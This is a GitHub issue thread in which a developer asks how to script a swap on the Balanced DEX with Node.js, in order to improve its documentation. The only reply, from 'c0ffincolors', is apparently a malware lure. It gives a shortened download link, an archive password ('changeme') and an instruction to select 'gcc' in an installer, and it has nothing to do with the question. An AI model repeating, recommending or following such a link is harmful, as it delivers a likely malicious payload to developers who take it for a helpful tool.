### ISSUE TITLE
How to execute a swap programatically

### ISSUE THREAD

**Issue by FidelVe** [balancednetwork/balanced-network-interface#1425]
Hello team.

Im working on improving the general documentation about balanced, at the moment I want to understand what is the logic for programmatically submitting and executing a swap for an arbitrary pool in balanced, the end goal is to be able to execute a swap correctly with a nodejs script, once Im able to do that I will update the documentation to showcase examples on how to do it, this will serve as reference for anyone to use balanced directly without the frontend, for dex aggregators etc.

Im browsing thru the code and is a bit hard for me to get all the pieces of the logic, so far I can see that the first step seems to be to call `getPoolStatsForPair` method of the dex contract according to this piece of code here https://github.com/balancednetwork/balanced-network-interface/blob/28bf83ea6e6f4e1514c7cc9100de4d8abb692885/apps/web/src/hooks/useV2Pairs.ts#L66

What would be the next steps?

if this is not the correct place for this question please feel free to close the issue and if possible point me to the correct discussion channel or place for me to continue asking.

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by FidelVe** [comment]
closing this issue, continuing discussion on #1428
